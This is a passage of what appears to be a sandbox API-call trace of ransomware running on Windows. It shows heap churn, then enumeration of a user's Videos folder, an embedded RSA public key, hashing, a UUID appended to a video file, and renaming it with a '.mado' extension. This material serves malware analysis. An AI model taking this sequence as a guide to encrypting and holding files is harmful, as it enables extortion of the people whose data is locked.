HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.493] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\") returned="MHAzaa\\" [0206.494] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\") returned="pElYZ7RBZiDz1\\" [0206.494] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\") returned="biDMIzVx5WSAFsePg\\" [0206.494] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0206.494] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.494] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.494] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.494] PathFindFileNameW (pszPath="") returned="" [0206.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdae2f400, ftCreationTime.dwHighDateTime=0x1d5e734, ftLastAccessTime.dwLowDateTime=0xabee89d0, ftLastAccessTime.dwHighDateTime=0x1d5e29c, ftLastWriteTime.dwLowDateTime=0xabee89d0, ftLastWriteTime.dwHighDateTime=0x1d5e29c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.494] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdae2f400, ftCreationTime.dwHighDateTime=0x1d5e734, ftLastAccessTime.dwLowDateTime=0xabee89d0, ftLastAccessTime.dwHighDateTime=0x1d5e29c, ftLastWriteTime.dwLowDateTime=0xabee89d0, ftLastWriteTime.dwHighDateTime=0x1d5e29c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.494] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ca40a0, ftCreationTime.dwHighDateTime=0x1d5da19, ftLastAccessTime.dwLowDateTime=0x8231a6f0, ftLastAccessTime.dwHighDateTime=0x1d5d954, ftLastWriteTime.dwLowDateTime=0x8231a6f0, ftLastWriteTime.dwHighDateTime=0x1d5d954, nFileSizeHigh=0x0, nFileSizeLow=0x139c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AOMjWJ.mkv", cAlternateFileName="")) returned 1 [0206.494] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\AOMjWJ.mkv") returned=".mkv" [0206.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\AOMjWJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\aomjwj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.495] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=80326) returned 1 [0206.495] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.497] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x139a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.497] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.499] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x139c6, lpOverlapped=0x0) returned 1 [0206.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.500] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321a68) returned 1 [0206.500] CryptCreateHash (in: hProv=0x321a68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.500] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.500] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.500] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.501] GetLastError () returned 0x0 [0206.501] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.501] CryptReleaseContext (hProv=0x321a68, dwFlags=0x0) returned 1 [0206.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.501] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.501] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.501] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b816a8, Size=0x218) returned 0x3b7c6a8 [0206.502] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x139c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.502] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0206.502] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.502] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.502] CloseHandle (hObject=0x63c) returned 1 [0206.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77d00 [0206.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77d00 | out: hHeap=0x2c0000) returned 1 [0206.504] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\AOMjWJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\aomjwj.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\AOMjWJ.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\aomjwj.mkv.mado")) returned 1 [0206.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.507] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.508] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52acab0, ftCreationTime.dwHighDateTime=0x1d5de2c, ftLastAccessTime.dwLowDateTime=0x5f509390, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0x5f509390, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x13062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kCmLP4DG7a0U.avi", cAlternateFileName="KCMLP4~1.AVI")) returned 1 [0206.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0206.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: 